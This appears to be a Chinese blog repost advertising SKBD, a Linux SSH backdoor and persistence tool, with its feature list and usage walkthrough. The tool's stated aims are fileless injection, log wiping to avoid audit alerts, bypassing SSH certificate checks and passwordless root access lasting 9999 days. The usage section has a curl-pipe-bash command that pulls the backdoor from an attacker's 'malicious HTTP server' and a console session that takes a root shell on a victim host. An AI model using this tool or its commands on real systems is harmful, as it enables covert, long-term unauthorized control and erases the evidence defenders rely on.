当前位置: 首页 > news >正文

SKBD(Scorpion-Killer) Linux-SSH长期隐藏后门持久化控制注入工具

其他工具: Tyran(暴君) 后渗透持久化控制

地址:https://github.com/MartinxMax/tyrant

4bd70646a60cef5503b218fde4e1960.jpg

SKBD (Scorpion-Killer)

地址:https://github.com/MartinxMax/skbd

logo.png

Linux-SSH后门注入持久化控制工具

  1. 无文件保存自动化后门注入
    使用curl请求,该工具能够自动执行后门注入操作,而不会在系统上留下任何显著的痕迹。

  2. 自动痕迹日志清理
    在后门注入过程中,该工具能够自动清除相关日志和痕迹,确保在监控和审计过程中不会触发警报。

  3. CA证书绕过监测
    通过利用CA证书机制,该工具能够绕过SSH服务器证书验证检查,进一步增强隐蔽性和持久性。

  4. 27年期限SSH后门
    注入的SSH后门最多可持续27年(9999天),确保长期访问和控制系统。

  5. 多个无密码用户的SSH登录
    支持多个SSH用户独立登录,且不需要密码,提高了灵活性和隐蔽性。

  6. 可移植性与数据迁移
    该工具允许将machines中的所有文件打包并发送给其他用户,支持无缝迁移,实现跨系统部署控制。


使用方法

PS:此脚本必须以ROOT权限执行。

skbd.py : 服务端 (API)

$ python3 skbd.py -h

image.png

skbdexec.py : 服务端 (命令执行)

$ python3 skbdexec.py

image-1.png

skbd.sh : 客户端 (载入skbd后门)

$ ./skbd.sh

image-2.png


示例:

  1. 启动恶意HTTP服务器

$ python3 -m http.server 8181

image-4.png

  1. 启动服务端 (API):

$ python3 skbd.py

image-5.png

endpoint: https://192.168.0.115:9191

  1. 启动服务端 (命令执行):
    PSskbdexec.py可以随时启动。

$ python3 skbdexec.py

image-6.png

  1. 向客户端注入skbd后门

$ curl http://<IP>:<PORT>/skbd.sh|bash -s -- -e 'https://<IP>:PORT'

image-3.png

  1. 在服务端(命令执行)访问客户端Shell:

SKBD # info

image-7.png

SKBD # use 1

SKBD[f6b50eecbeca4b61a7e8932c3e9cf9f2]# show

image-8.png

+-------------------------------------------+-------------------------------------------+
| Configuring Machine: f6b50eecbeca4b61a7e8932c3e9cf9f2    |
+-------------------------------------------+-------------------------------------------+
| Parameter          | Value                            |
+-------------------------------------------+-------------------------------------------+
| users              | root,postgres,map                 | (Editable) |
| ips                | 192.168.0.111,                    | (Editable) |
| sn                 | f6b50eecbeca4b61a7e8932c3e9cf9f2  | (Editable) |
+-------------------------------------------+-------------------------------------------+

此列表显示了客户端可进行SSH登录的用户(root,postgres,map)。可以通过使用命令set user map来更改已登录的用户会话。

SKBD[f6b50eecbeca4b61a7e8932c3e9cf9f2]# set user root

最终的登录参数:

+-------------------+-------------------+
| user: root        |
| ip: 192.168.0.111 |
| port: 22          |
+-------------------+-------------------+

SKBD[f6b50eecbeca4b61a7e8932c3e9cf9f2]# run

image-9.png

相关文章:

  • 如何设置动态代理提高Python爬虫稳定性?
  • 模块化开发实战:解剖module-info.java的8个关键场景
  • Jmeter中的身份认证:cookie和token
  • Linux系统中快速安装docker
  • github匿名链接获取方法
  • 深度学习处理文本(1)
  • 深入理解MySQL索引:从二叉搜索树到B+Tree
  • STM32-DMA
  • opencv python的 Canny findContours得到两个非常接近的轮廓,角点有几个像素的差距,如何处理?
  • Java学习笔记1——编程基础
  • 终值定理的推导与理解
  • <em>乐</em><em>发</em><em>V</em><em>Ⅱ</em><em>彩</em><em>票</em>
  • 在MCU工程中优化CPU工作效率的几种方法
  • 变量1(WEB)
  • dart错误记录
  • 高项第十六章——项目采购管理
  • word-spacing 属性
  • vector<int> 的用法
  • Java 大视界 -- Java 大数据在智慧矿山设备故障预测与预防性维护中的技术实现(163)
  • 3. 列表元素替换